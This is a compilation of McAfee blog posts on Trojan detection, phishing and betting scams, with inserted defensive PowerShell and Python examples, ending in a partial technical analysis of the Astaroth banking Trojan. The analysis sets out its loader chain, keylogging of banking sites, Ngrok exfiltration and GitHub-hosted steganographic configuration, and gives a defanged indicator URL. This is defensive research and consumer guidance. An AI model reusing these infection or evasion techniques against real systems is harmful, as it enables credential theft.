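    Two caveats when reading the output. Some Windows components are signed through a catalog rather than an embedded signature and can show up as NotSigned; a file that lives under C:\Windows\System32 and matches a known component is not the problem. Conversely, a valid signature only tells you who signed the file, not that you wanted it running, so an entry signed by a publisher you have never heard of still deserves a look at its path and command line.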

    4. Scan with Windows security

    You can also scan your PC using Windows’ built-in virus and threat protection. Microsoft Defender Antivirus is managed through the Windows Security app (called Windows Defender Security Center in older versions of Windows 10) and can run quick, full, and custom scans that detect many types of malware.

    Microsoft Defender is a capable tool that can detect and remove many common Trojans. For basic protection, it provides a solid first line of defense and is far better than having no security at all. It handles known threats well and is constantly updated by Microsoft. If a detection keeps coming back after removal, use the “Microsoft Defender Offline scan” option under Scan options: it reboots the PC and scans from outside the running operating system, so a Trojan’s startup entries and other persistence tricks can’t interfere with cleanup.

    However, a dedicated security suite offers more comprehensive, layered protection. This goes beyond simple malware removal to include advanced features like a robust firewall, real-time phishing protection that blocks malicious websites before they load, identity safeguards, and a VPN for secure browsing. These layers work together to stop threats *before* they can infect your PC, which is always better than removing them after the fact.

    Think of it as the difference between a standard lock on your door and a full home security system. For everyday, low-risk browsing, the built-in tool may be enough. However, for anyone who banks, shops, or shares personal information online, the added protection of a comprehensive security suite provides essential peace of mind against a broader range of threats.
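    Everything Windows Security does from the app can also be driven from PowerShell, which makes it easier to check the state of the built-in protection before you trust a scan result. The script below is an added example written for this article, not McAfee’s code and not part of the original post; it uses the Defender cmdlets that ship with Windows 10 and 11 and assumes an elevated prompt. It checks whether real-time protection is on and the signatures are fresh (a Trojan that has “disabled security software,” one of the red flags listed earlier, shows up here first), updates signatures, runs a full scan, and then lists what Defender found.

```powershell
# Added example, not from the McAfee article: drive Microsoft Defender from
# PowerShell. Assumption: Windows 10/11 with the built-in Defender module,
# run from an elevated prompt.

# 1. Is real-time protection on, and are the signatures fresh?
$status = Get-MpComputerStatus
$status | Select-Object AMRunningMode, RealTimeProtectionEnabled,
  AntivirusSignatureLastUpdated, AntivirusSignatureAge, QuickScanEndTime, FullScanEndTime |
  Format-List

# Malware that tampers with the AV typically leaves one of these two fingerprints.
if (-not $status.RealTimeProtectionEnabled) { Write-Warning 'Real-time protection is OFF' }
if ($status.AntivirusSignatureAge -gt 7)    { Write-Warning "Signatures are $($status.AntivirusSignatureAge) days old" }

# 2. Refresh signatures and run a full scan. The scan blocks until it finishes,
#    which can take a long time on a large disk.
Update-MpSignature
Start-MpScan -ScanType FullScan

# 3. What did Defender find, and did the remediation succeed?
Get-MpThreatDetection |
  Sort-Object InitialDetectionTime -Descending |
  Select-Object InitialDetectionTime, ThreatID, ProcessName, Resources, ActionSuccess |
  Format-Table -AutoSize -Wrap

# Threats Defender currently knows about on this machine; IsActive = True means it is not gone yet.
Get-MpThreat | Select-Object ThreatName, SeverityID, IsActive | Format-Table -AutoSize

# 4. If a detection keeps returning, reboot into Microsoft Defender Offline, which
#    scans from outside the running OS. This restarts the machine immediately,
#    so save your work first; it is commented out here for that reason.
# Start-MpWDOScan
```

    The ActionSuccess column is the one to watch: a detection with ActionSuccess = False, or a threat that stays IsActive after a reboot and rescan, is the case where the offline scan (or a full reinstall) is the right next step rather than another pass of the same scan.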

    Remember to check your network

    Most Trojans communicate with a remote command-and-control server to receive instructions or send stolen data through your internet connection. By monitoring your network activity, you can spot these hidden connections early. Unusual outbound traffic, unfamiliar IP addresses, or constant background data transfers are all red flags that something malicious might be operating behind the scenes.

    • Monitor active connections: Use the Resource Monitor tool in Windows (resmon.exe) to see which applications are using your network. Look for any unfamiliar processes making outbound connections.
    • Verify DNS and proxy settings: In your Windows network settings, check that your DNS server and proxy settings haven’t been changed. Trojans often alter these to redirect your traffic through malicious servers.
    • Firewall logs: Firewall logs can show repeated attempts by a specific program to connect to the internet, which is a strong indicator of a Trojan trying to communicate with its operator.
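    The three network checks above (active connections, DNS and proxy settings, firewall logging) can be pulled together in a short PowerShell script. This is an added example written for this article, not McAfee’s code and not from the original post; it uses only cmdlets that ship with Windows 10 and 11 and assumes an elevated prompt. It lists established outbound TCP connections to non-private addresses joined to the owning process and its image path, groups them so a program that talks to the same host over and over stands out, then dumps the DNS servers per adapter, the user proxy settings, the non-comment lines of the hosts file (another common redirect trick), and whether each firewall profile is logging and where.

```powershell
# Added example, not from the McAfee article: correlate outbound connections
# with processes and show the settings a Trojan most often changes.
# Assumption: Windows 10/11 with the NetTCPIP, DnsClient and NetSecurity
# modules (present by default), run from an elevated prompt.

# Loopback and RFC 1918 space; anything else counts as "outbound to the internet"
function Test-PrivateAddress([string]$Ip) {
  return ($Ip -match '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.|0\.0\.0\.0|::1$|fe80:)')
}

# PID -> process lookup so each connection can be tied to an image path
$procs = @{}
Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

$conns = Get-NetTCPConnection -State Established |
  Where-Object { -not (Test-PrivateAddress $_.RemoteAddress) } |
  ForEach-Object {
    $p = $procs[[int]$_.OwningProcess]
    [pscustomobject]@{
      Process = if ($p) { $p.ProcessName } else { '<unknown>' }
      PID     = $_.OwningProcess
      Image   = if ($p) { $p.Path } else { '' }
      Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    }
  }

# Many connections from one unfamiliar image to one remote host is the
# "constant, unexplained network activity" symptom described earlier.
"--- Outbound connections by process and remote host ---"
$conns | Group-Object Process, Remote | Sort-Object Count -Descending |
  Select-Object Count, Name | Format-Table -AutoSize
"--- Image paths behind those processes ---"
$conns | Select-Object Process, PID, Image -Unique | Format-Table -AutoSize

# DNS servers per adapter: anything other than your router, your ISP, or a
# resolver you configured yourself is worth questioning.
"--- DNS servers ---"
Get-DnsClientServerAddress -AddressFamily IPv4 |
  Where-Object { $_.ServerAddresses } |
  Select-Object InterfaceAlias, ServerAddresses | Format-Table -AutoSize

# User proxy settings: ProxyEnable = 1 with a ProxyServer you never set, or an
# AutoConfigURL pointing somewhere odd, routes your browsing through the attacker.
"--- Proxy settings (HKCU) ---"
Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' |
  Select-Object ProxyEnable, ProxyServer, AutoConfigURL | Format-List

# hosts file overrides: a bank's domain mapped to an unfamiliar IP is a redirect
"--- hosts file entries ---"
Get-Content "$env:SystemRoot\System32\drivers\etc\hosts" |
  Where-Object { $_ -notmatch '^\s*#' -and $_.Trim() }

# Is the firewall logging at all, and where? Without LogBlocked/LogAllowed
# turned on there are no "repeated attempts" to read back.
"--- Firewall logging ---"
Get-NetFirewallProfile | Select-Object Name, Enabled, LogAllowed, LogBlocked, LogFileName | Format-Table -AutoSize
```

    If the firewall profiles show LogBlocked or LogAllowed as False, turn logging on before you go hunting (Set-NetFirewallProfile -LogBlocked True, and LogAllowed if you want successful connections too); the default log path is shown in the LogFileName column. A Trojan that has been running for a while often also has a firewall rule of its own to let it out, so a glance at Get-NetFirewallRule -Direction Outbound -Action Allow for rules you don’t recognize is worthwhile at the same time.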

    Choose the best Trojan scanner & removal tool

    If you’re in the market for a tool that scans and removes Trojans, you have the option of free or premium tools. Whichever you choose, the key is to act quickly but carefully before the Trojan can cause any lasting damage.

    Free tools are a great step

    A free scan is the perfect first step to determine if you have a Trojan virus on your system. These no-cost tools provide an immediate way to detect potential threats and give you peace of mind about your PC’s security status.

    Free Trojan scanners work by examining your system files, running processes, and common hiding spots where malware typically lurks. They check for known Trojan signatures, suspicious file behaviors, and registry modifications that indicate a possible infection. While they may not catch every advanced threat, they’re excellent for identifying common Trojans and giving you a clear starting point.

    Simple steps to run your free scan

    1. Choose your scanner: Download a reputable, free scanning tool from the official website of a trusted security provider. Ensure your scanner has the latest threat definitions for maximum effectiveness.
    2. Close other programs: Restart your PC in Safe Mode and close any unnecessary applications to improve scan performance and accuracy.
    3. Run a full system scan: Make sure you select the free tool’s comprehensive scan option to check all files, not just a quick scan.
    4. Review the results: Carefully examine any detected threats, noting their names and file locations. When threats are found, most free scanners will categorize them by risk level and provide recommended actions.
    5. Take action on findings: Quarantine or delete identified threats as recommended by the scanner. High-risk items should be immediately quarantined or deleted, while suspicious files may need further analysis. Be careful, as some legitimate files can occasionally trigger false positives.
    6. Restart and rescan: Reboot your PC and run another scan to confirm that the Trojan or any other threat has been completely removed.

    Free scanning tools provide valuable insights into your system’s health and serve as an excellent diagnostic tool to check for Trojan presence. However, they typically offer detection and removal only, without the real-time protection needed to prevent future infections.

    Comprehensive scanning with McAfee antivirus

    For comprehensive security that stops threats before they can infect your system, consider upgrading to a complete security solution that provides continuous monitoring and advanced threat protection. Modern antivirus suites, such as McAfee Total Protection, are expertly designed to detect and block Trojans. They use a layered security model that includes signature detection to identify known malware, behavioral analysis to spot suspicious activities characteristic of a Trojan, and artificial intelligence to protect against the very latest threats. Real-time protection actively scans files as you access them, while scheduled and manual scans allow you to thoroughly check your entire system for any hidden malware.

    McAfee software is especially effective in scanning for Trojans and other types of malware and removing them before they can cause damage to your computer system. With real-time, on-demand, and scheduled scanning of files and applications at your disposal, we’ll help you detect and eliminate any emerging threats in a timely manner.

    Remove the Trojan from any platform

    On any computer platform, whether Windows or macOS, the process of scanning and removing a Trojan with McAfee software is similar and achievable. These steps will help you regain control of your device:

    1. Disconnect your PC: Unplug your Ethernet cable or turn off Wi-Fi to stop the Trojan from communicating online.
    2. Reboot in Safe Mode: Restart your computer in Safe Mode to prevent most malware from loading.
    3. Run a full antivirus scan: Use a trusted tool like McAfee to run a complete scan and quarantine or delete any threats it finds.
    4. For Mac: Run a full system scan with trusted security software designed for macOS.
    5. Reset your browsers: Return your web browsers to their default settings to remove any malicious or unfamiliar extensions or changes. Then update Windows or macOS to the latest version to patch the security vulnerabilities the Trojan may have relied on.
    6. Reboot and rescan: Restart your computer normally and run a full scan again to confirm the Trojan is completely removed.
    7. Change all your passwords: Once your computer is clean, immediately change passwords for your email, banking, and other important accounts. Do this from a different device you trust, in case anything was missed, and turn on multi-factor authentication while you’re at it.

    Once you’ve completed the removal process, strengthen your defenses by enabling automatic updates, using reputable security software, and being cautious about downloads and email attachments. Regular system scans and keeping your software current are your best protection against future infections. One caveat: if the scan found a backdoor or remote access Trojan, an attacker may have had full control of the machine, and a cleanup cannot prove they left nothing behind. In that case, back up only your data files and reinstall the operating system from known-good media. With these steps, you can confidently clean your devices and prevent repeat attacks.

    Quick tips to prevent a Trojan virus invasion

    • Keep software updated: Enable automatic updates for your operating system, web browser, and applications to patch security vulnerabilities.
    • Scrutinize emails: Do not open attachments or click links from unknown or suspicious senders. Verify requests for information.
    • Use strong, unique passwords: Employ a password manager to create and store complex passwords for each of your online accounts.
    • Enable a firewall: Ensure your network firewall is active to monitor and control incoming and outgoing network traffic.
    • Backup data regularly: Keep regular backups of your important files so you can restore them in case of a ransomware attack or data corruption.
    • Avoid risky downloads: Only download applications from official websites and trusted app stores.
    • Enable multi-factor authentication (MFA): Add this extra security layer to your important online accounts.
    • Use real-time protection: Ensure a comprehensive security suite, such as McAfee, is always running to detect threats instantly.

    FAQs about Trojans

    What is a Trojan horse?

    A Trojan is malware that disguises itself as a legitimate file or program. Once you run it, it can perform malicious actions such as stealing data or giving an attacker remote control of your PC.

    How does a Trojan spread?

    Trojans don’t spread on their own. They rely on you to download and run them. This often happens through phishing emails with fake attachments, malicious ads, or downloads of cracked software.

    Can Macs and phones get infected by Trojans?

    Yes. While less common than on Windows PCs, Trojans exist for all major operating systems, including macOS, Android, and iOS. It’s crucial to only install apps from official app stores to stay safe.

    What is the quickest way to check for a Trojan?

    The fastest and most reliable method to check for a Trojan in your computer is to run a full system scan with a trusted antivirus program. This will check all files and running processes for known threats.

    How long does it take to remove a Trojan?

    Removal time can vary. A good antivirus scan might find and remove it in under an hour. However, some complex Trojans may require more steps, like booting into Safe Mode, which can take longer.

    What should I do immediately after removing a Trojan?

    Once your system is clean, the first thing you should do is change the passwords for all your important accounts, especially email, banking, and social media, as the Trojan may have stolen them.

    Final thoughts

    Wondering if a Trojan has infected your computer can be worrying, but it’s a manageable issue with the right approach. By understanding the signs of a Trojan virus and using the detection methods outlined, you can take back control of your device’s security. To prevent getting infected by a Trojan, proactive measures such as safe online habits and the layered defense of a trusted security suite like McAfee are your best defenses. Stay vigilant and keep your software up to date, so you can confidently navigate the digital world.

    The post Best Ways to Check for a Trojan on Your PC appeared first on McAfee Blog.

    Holiday Shopping 2025: US Fact Sheet 

    By: McAfee

    The holidays are supposed to be about joy and generosity — but this year, they’re also peak season for AI-powered scams. New research from McAfee, a global leader in online protection, shows how fraudsters are using artificial intelligence to create more convincing lures — from deepfake endorsements to cloned delivery messages — as Americans head online to shop.

    US – Holiday Shopping 2025 Fact Sheet 

    The post Holiday Shopping 2025: US Fact Sheet  appeared first on McAfee Blog.

    This Week in Scams: Fake Steaks and Debit Card Porch Pirates

    By: McAfee

    We’re back with a new edition of “This Week in Scams,” a roundup of what’s current and trending in all things sketchy online.

    This week, we have fake steaks, why you should shop online with a credit card, and a new and utterly brash form of debit card fraud.

    Fake steaks from “0maha Steaks”

Yes, the letter “O” for Omaha in the subject line of this email scam is actually a zero. And that’s not the only thing that’s off with this email; it’s a total scam.

    An image of a scam 0maha Steaks email.

     

    If you like your choice cuts, the name Omaha Steaks might be a familiar one. They’ve been around for almost 110 years, and since 1953 they’ve been in the mail order meat business. Today, they sell, well, just about anything you can picture in the butcher or seafood case. With that, the company enjoys a premium reputation, so it’s little surprise scammers have latched onto it and built a phishing attack around the brand—one they garnish with a nod to concerns over rising food prices.

A few things can quickly tip you off to this scam. For starters, the scammers oddly spell Omaha with a zero in the subject line, as mentioned. From there, the sender’s email address is a straight red flag. In this case, it’s the curiously spelled “steaksamplnext” followed by a (redacted) domain name that isn’t the legitimate omahasteaks dot-com address. Also curious is the lack of an actual price for the bogus “Gourmet Box.” And lastly, you might think that a premium foods brand would showcase some pictures of their famous fare in the email. Not so here.

    Rounding it out, you’ll see the classic scammer tactics of scarcity and urgency, which scammers hope will pressure people to act immediately. In this case, only 500 of these supposed boxes are available, and the offer “concludes tomorrow.”

    How to avoid Omaha Steak scams and phishing scams like them

Even as this scam makes the rounds, it’s easy to spot if you give it a closer look and a little thought, which gives it a sort of old-school feel. However, more and more of today’s phishing emails look increasingly legit, thanks to AI tools, which might get you to click.

    As for phishing attacks like this in general, you can protect yourself by:

    Always checking the email address of the sender. If it doesn’t match the proper address of the company or brand that’s supposedly sending the email, it’s a scam. In this case, from the people at Omaha Steaks themselves, “If it doesn’t show OmahaSteaks.com and @OmahaSteaks, it’s not us!”

    Looking for addresses and links that look like they’ve been slightly altered so that they seem “close enough” to the real thing. In this case, the scammer didn’t even bother to try. However, you could expect an alteration like “omahasteakofferforyou.com” to try and look legit.

    Getting a scam detector. Our Scam Detector, found in all core McAfee plans, helps you stay safer with advanced scam detection technology built to spot and stop scams across text messages, emails, and videos. It’ll also block those sites if you accidentally tap or click on a bad link.
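The first two tips above can be turned into a small mail-filter check. This is an added example, not code from the McAfee post: the brand’s legitimate domain comes from the Omaha Steaks quote, the homoglyph table and the sample From headers and subjects are constructed.

```python
from email.utils import parseaddr

# Legitimate sending domain for the brand, per the Omaha Steaks statement quoted above.
BRAND = "omaha"
LEGIT_DOMAINS = {"omahasteaks.com"}

# Digits and symbols commonly swapped for look-alike letters in lures such as "0maha" (assumed table).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})

def normalize(text: str) -> str:
    """Lower-case and undo digit-for-letter substitutions so '0maha' compares equal to 'omaha'."""
    return text.lower().translate(HOMOGLYPHS)

def sender_domain(from_header: str) -> str:
    """Extract the domain part of a From: header such as 'Omaha Steaks <x@example.invalid>'."""
    _, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def is_legit_domain(domain: str) -> bool:
    """True only for the brand's own domain or a subdomain of it (e.g. mail.omahasteaks.com)."""
    return any(domain == d or domain.endswith("." + d) for d in LEGIT_DOMAINS)

def check_email(from_header: str, subject: str) -> list[str]:
    """Return the reasons a message looks like a brand-impersonation lure; empty list if none."""
    reasons = []
    domain = sender_domain(from_header)
    brand_in_subject = BRAND in normalize(subject)
    # 1. The brand name is spelled with look-alike characters (the "0maha" trick).
    if brand_in_subject and BRAND not in subject.lower():
        reasons.append("subject spells the brand with look-alike characters")
    # 2. The brand is named in the subject but the mail comes from an unrelated domain.
    if brand_in_subject and not is_legit_domain(domain):
        reasons.append(f"sender domain {domain or '(none)'} is not the brand's domain")
    # 3. The domain contains the brand name but is not the real one ("omahasteakofferforyou.com").
    if BRAND in normalize(domain) and not is_legit_domain(domain):
        reasons.append(f"look-alike domain {domain}")
    return reasons

if __name__ == "__main__":
    # Constructed sample: the scam described above, a legitimate mailing, and a look-alike domain.
    samples = [
        ("Omaha Steaks <steaksamplnext@example.invalid>", "0maha Steaks Gourmet Box - only 500 left"),
        ("Omaha Steaks <news@mail.omahasteaks.com>", "Omaha Steaks holiday offer"),
        ("<offers@omahasteakofferforyou.com>", "Your gift box"),
    ]
    for frm, subj in samples:
        print(f"{frm!r}: {check_email(frm, subj) or 'looks consistent'}")
```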

    One good reason for using your credit card when shopping online.

    What’s the most common kind of fraud? If you said, “credit card,” you’ll find it number five on the list. The top form is debit cards, according to 2025 findings from the U.S. Federal Reserve.

    As reported by financial institutions, the Fed found that attempts at debit card fraud rose to 73% with 52% of those attempts being successful.

There’s a good reason that debit card fraud ranks highest for attempts and success rate. It’s the same reason that credit card fraud is relatively low. Debit cards don’t have the same fraud protections in place that credit cards do.

    As you might have read in our blogs before, credit cards offer additional protection thanks to the Fair Credit Billing Act (FCBA). Your maximum liability is $50 for fraudulent charges on a lost or stolen card if you report the loss to your issuer within 60 days. In the case of relatively unprotected debit cards, those losses often go unrecovered.

    Keep this in mind as you sit down for your online shopping for the holidays: use a credit card instead of a debit card. That gives you the protection of the FCBA if your shopping session gets hacked or if the retailer experiences a data breach somewhere down the road. Also think about making it even safer by shopping with a VPN. Our VPN creates an encrypted “tunnel” that protects your data from crooks and prying eyes, so your card info stays private.

    A new debit card scam with a porch pirate twist

    First reported by the FBI last year, we’re seeing continued reports of a brash and bold form of debit card scam—people physically handing over their cards to scammers.

    The scam starts like many card scams do, with a phone call. Scammers spoof the caller ID of the victim’s bank or credit union, ring them up, and tell them there’s a “problem” with their account. From there, scammers direct victims to cut up their current card—but with a twist. They tell victims to keep the little EMV chip for tap-and-go payments intact.

Why? Victims get instructed to leave the cut-up card and intact chip in the mailbox for a “courier” to pick up for “security purposes.” Once in hand, scammers get access to the bank account associated with the chip. Even if the scammers don’t wrangle a PIN out of their victims with a little social engineering trickery, they can still make purchases with the chip, as some points of sale don’t require a PIN when tapping to pay.

    Here’s how you can avoid the “porch pirate” debit card scam

    Shred your old cards in a paper shredder. Then, take the next step. Grab the shredded pieces and throw them away in separate batches. This will all make it fantastically tough for a scammer to piece together your card and steal your info.

    Call back your bank yourself. If you get a call, voicemail, or text saying there’s an issue with your account, you can verify any possible issue yourself by calling the number on the back of your card.

    Know that banks won’t send “couriers” for cards. And they’ll simply never ask you to leave your card in your mailbox.

    Other scam and cybersecurity headlines this week

    That’s our roundup for this week. We’ll catch you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: Fake Steaks and Debit Card Porch Pirates appeared first on McAfee Blog.

    Kickoffs and Rip-offs—Watch Out for Online Betting Scams This Football Season

    By: McAfee

    Football season is in full swing — tailgates, rivalries, fantasy leagues, and Sunday afternoons glued to the screen. Alongside the highlights and heartbreaks, there’s another game playing out online: the rush to place bets.

    Every break in the action brings another sportsbook promo — risk-free wagers, bonus bets, exclusive odds — flooding your feed and inbox. But what you don’t see between the ads and sponsorships is how much money is really in play, or how scammers have joined the lineup.

    Last year, legally licensed online and retail sportsbooks took nearly $150 billion in bets, a 22.2% jump from 2023 according to the American Gaming Association. And with so much of that money flowing through apps and websites, scammers are finding creative new ways to cash in.

    They’re setting up fake betting sites, phishing for logins, and spinning up unlicensed offshore platforms that operate without oversight. Even self-proclaimed “insider tipsters” are pitching guaranteed wins that never exist.

    If sports betting is legal in your state and you’re planning to make some wagers this season, here’s how to keep your money — and your data — safe.

    Is online sports betting legal in my state?

    Since a U.S. Supreme Court ruling in 2018, individual states can determine their own laws for sports betting. Soon after, sports betting became legal in waves. In all, 39 states and Washington D.C. currently offer sports betting through licensed retail locations. Of them, 31 further offer legal sports betting through licensed online apps and websites. The map below offers a quick view as to how all that plays out.

    Map of US states that have legalized sports betting.

    Image from https://sportsdata.usatoday.com/legality-map 

    Even as online sportsbooks must be licensed to operate legally, be aware that the terms and conditions they operate under vary from service to service. Per the Better Business Bureau (BBB), that calls for closely reading their fine print. For one, you might come across language that says the company can “restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, because “like any sales pitch, these can be deceptive.”

    What do online betting scams look like?

    Fake betting sites

    This form of scam follows the same playbook scammers use for all kinds of bogus sites in general. They cook up a copycat site that looks like a legitimate betting site, create a web address that looks like it could be legitimate, and then flood the web with sponsored search results, ads, and social media posts to drive traffic to them. From there, scammers capture payment info and take bogus bets that they never pay out on. Once the site gets discovered as a scam, they pull it down and spin up other scam sites. With the aid of AI tools to help with the process, scammers can turn around scam sites quickly.

    Sports app phishing scams

    Scammers piggyback on legitimate betting apps and sites another way. They’ll create phony customer support sites that they promote online, with the addition of scam texts and emails to lure in victims. Under the guise of support, they gain a victim’s login info, hack the account, and clean out the victim’s cash.

    Unlicensed offshore platforms

    These form a gray area when it comes to scams. Some of these offshore platforms, while unlicensed, are legitimate to varying degrees. What makes them dangerous is that they have no regulatory oversight, which means they can do things like charge hidden costs, lock accounts, and refuse payment without users having any way to dispute those actions. Some of these platforms might have suspect security measures as well, which could lead to account hacks. And of course, some of these offshore platforms are simply fake betting sites, as mentioned above.

    Handicapper scams

    Earlier this year, the BBB shared word of a growing scam where self-proclaimed experts with “insider information to place sure-thing bets” reach out to victims via email and social media posts. Per the BBB, “A handicapper’s goal isn’t to win bets for their members, it’s to get people to buy their picks. Once you’ve purchased their picks, the handicapper has already won. It doesn’t matter if the pick wins or loses, the handicapper keeps the payment.”

    Of course, that “insider info” is entirely fake. It’s all just a smokescreen to draw in victims.

    Ready to place your bet online? Keep these things in mind.

    1) Stick with legitimate betting sites and apps. Use only legal, regulated sportsbooks when you place a bet.

    If you’re a sports fan, you probably know the names, like BetMGM, DraftKings, FanDuel, bet365 and Fanatics Sportsbook. In addition, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of customer ratings, complaints registered against the organization, and the organization’s response to the complaints, along with its BBB rating, if it has one.

    2) Use a secure payment method other than your debit card. Credit cards are a good way to go when buying, or betting, online.

One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card company may have its own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act.

    3) Protect yourself from fake betting sites and bogus offers.

    You can steer clear from all kinds of fake sites and bogus offers with the combination of our Web Protection and Scam Detector, found in our McAfee+ plans. They’ll alert you if a link might take you to a sketchy site, and they’ll block those sites if you accidentally tap or click on a bad link.

In addition to the latest virus, malware, spyware, and ransomware protection, McAfee+ also includes strong password protection by generating and automatically storing complex passwords to keep your winnings and payment info safer from hackers and crooks.

     

    Editor’s Note:

    If gambling is a problem for you or someone you know, you can seek assistance from a qualified service or professional. Several states have their own helplines, and nationally you can reach out to resources like http://www.gamblersanonymous.org/ or https://www.ncpgambling.org/help-treatment/.

    The post Kickoffs and Rip-offs—Watch Out for Online Betting Scams This Football Season appeared first on McAfee Blog.

    Astaroth: Banking Trojan Abusing GitHub for Resilience

    by Harshil Patel and Prabudh Chakravorty

    *EDITOR’S NOTE: Special thank you to the GitHub team for working with us on this research. All malicious GitHub repositories mentioned in the following research have been reported to GitHub and taken down.

    Digital banking has made our lives easier, but it’s also handed cybercriminals a golden opportunity. Banking trojans are the invisible pickpockets of the digital age, silently stealing credentials while you browse your bank account or check your crypto wallet. Today, we’re breaking down a particularly nasty variant called Astaroth, and it’s doing something clever: abusing GitHub to stay resilient.

    McAfee’s Threat Research team recently uncovered a new Astaroth campaign that’s taken infrastructure abuse to a new level. Instead of relying solely on traditional command-and-control (C2) servers that can be taken down, these attackers are leveraging GitHub repositories to host malware configurations. When law enforcement or security researchers shut down their C2 infrastructure, Astaroth simply pulls fresh configurations from GitHub and keeps running. Think of it like a criminal who keeps backup keys to your house hidden around the neighborhood. Even if you change your locks, they’ve got another way in.

    Key Findings 

    • McAfee recently discovered a new Astaroth campaign abusing GitHub to host malware configurations. 
    • Infection begins with a phishing email containing a link that downloads a zipped Windows shortcut (.lnk) file. When executed, it installs Astaroth malware on the system. 
    • Astaroth detects when users access a banking/cryptocurrency website and steals the credentials using keylogging.  
    • It sends the stolen information to the attacker using the Ngrok reverse proxy. 
• Astaroth uses GitHub to update its configuration when the C2 servers become inaccessible, by hosting images on GitHub that use steganography to hide the configuration in plain sight. 
• The GitHub repositories were reported to GitHub and have been taken down. 

    Key Takeaways  

    • Don’t open attachments and links in emails from unknown sources. 
• Use two-factor authentication (2FA) on banking websites where possible. 
    • Keep your antivirus up to date. 

    Geographical Prevalence 

    Astaroth is capable of targeting many South American countries like Brazil, Mexico, Uruguay, Argentina, Paraguay, Chile, Bolivia, Peru, Ecuador, Colombia, Venezuela, and Panama. It can also target Portugal and Italy. 

    But in the recent campaign, it seems to be largely focused on Brazil. 

    Figure 1: Geographical Prevalence 

     

    Conclusion 

    Astaroth is a password-stealing malware family that targets South America. The malware leverages GitHub to host configuration files, treating the platform as resilient backup infrastructure when primary C2 servers become inaccessible. McAfee reported the findings to GitHub and worked with their security research team to remove the malicious repositories, temporarily disrupting operations. 

     

    Technical Analysis 

    Figure 2 : Infection chain 

     

    Phishing Email 

The attack starts with an email to the victim that contains a link to a site that downloads a zip file. Emails with themes such as DocuSign and résumés are used to lure the victims into downloading the zip file. 

    Figure 3: Phishing Email

    Figure 4: Phishing Email

    Figure 5: Phishing Email

     

    JavaScript Downloader 

The downloaded zip file contains an LNK file that carries an obfuscated JavaScript command, run using mshta.exe. 

     

This command simply fetches more JavaScript code from the following URL: 

     

    To impede analysis, all the links are geo-restricted, such that they can only be accessed from the targeted geography. 

The downloaded JavaScript then downloads a set of files into ProgramData from a randomly selected server: 

    Figure 6: Downloaded Files

Here: 
• “Corsair.Yoga.06342.8476.366.log” is the compiled AutoIt script, 
• “Corsair.Yoga.06342.8476.366.exe” is the AutoIt interpreter, 
• “stack.tmp” is the encrypted payload (Astaroth), and 
• “dump.log” is the encrypted malware configuration. 

The JavaScript then executes the AutoIt script, which builds shellcode and loads it into the memory of the AutoIt process. 

     

    Shellcode Analysis 

    Figure 7: AutoIt script building shellcode

The shellcode has three entry points; $LOADOFFSET is the one through which it loads a DLL into memory. 

To run the shellcode, the script hooks Kernel32’s LocalCompact and makes it jump to that entry point. 

    Figure 8: Hooking LocalCompact API 

     
The shellcode’s $LOADOFFSET entry point starts by resolving a set of APIs that are used for loading a DLL into memory. The API addresses are stored in a jump table at the very beginning of the shellcode memory. 

    Figure 9: APIs resolved by shellcode 

     

Here the shellcode is made to load a DLL file (written in Delphi), and this DLL decrypts the final payload and injects it into a newly created RegSvc.exe process. 

     

    Payload Analysis 

The payload, the Astaroth malware itself, is written in Delphi. It uses various anti-analysis techniques and shuts down the system if it detects that it is being analyzed. 

    It checks for the following tools in the system: 

    Figure 10: List of analysis tools 

     

It also checks that the system locale is not related to the United States or English. 

Every second it checks for program windows such as browsers; if such a window is in the foreground and has a banking-related site open, it hooks keyboard events to capture keystrokes. 

    Figure 11: Hooking keyboard events 

    Programs are targeted if they have a window class name containing chrome, ieframe, mozilla, xoff, xdesk, xtrava or sunawtframe.

Many banking-related sites are targeted, some of which are mentioned below: 
• caixa.gov.br 
• safra.com.br 
• Itau.com.br 
• bancooriginal.com.br 
• santandernet.com.br 
• btgpactual.com 

We also observed some cryptocurrency-related sites being targeted: 
• etherscan.io 
• binance.com 
• bitcointrade.com.br 
• metamask.io 
• foxbit.com.br 
• localbitcoins.com 

    C2 Communication & Infrastructure 

The stolen banking credentials and other information are sent to the C2 server using a custom binary protocol. 

    Figure 12: C2 communication  

     

    Astaroth’s C2 infrastructure and malware configuration are depicted below. 

    Figure 13: C2 infrastructure 

The malware configuration is stored encrypted in dump.log; the following information is stored in it: 

    Figure 14: Malware configuration 

     

    Every 2 hours the configuration is updated by fetching an image file from config update URLs and extracting the hidden configuration from the image. 

    hxxps://bit[.]ly/4gf4E7H —> hxxps://raw.githubusercontent[.]com//dridex2024//razeronline//refs/heads/main/razerlimpa[.]png 

The image file keeps the configuration hidden by storing it in the following format: 

We found more such GitHub repositories hosting image files with the above pattern and reported them to GitHub, which has taken them down. 

    Persistence Mechanism  

For persistence, Astaroth drops an LNK file in the Startup folder that runs the AutoIt script to launch the malware when the system starts.  
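The behaviours reported in the JavaScript Downloader, Shellcode Analysis, Payload Analysis, C2 and Persistence sections can be turned into hunting logic over endpoint telemetry. The following is an added example, not McAfee’s code: it scores constructed process-creation events against four stages of the chain (mshta.exe running an inline javascript: command, a ProgramData executable given a .log file as its script, RegSvc.exe spawned from ProgramData, and an outbound connection to an ngrok TCP tunnel endpoint). Only the dropped file names come from the post; the RegSvc.exe path, the ngrok hostname and the event format are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Process-creation record in the shape of a Sysmon Event ID 1 (constructed for this example)."""
    image: str           # full path of the new process
    cmdline: str         # its command line
    parent_image: str    # full path of the parent process
    dest_host: str = ""  # hostname of an outbound connection made by the process, if one was logged

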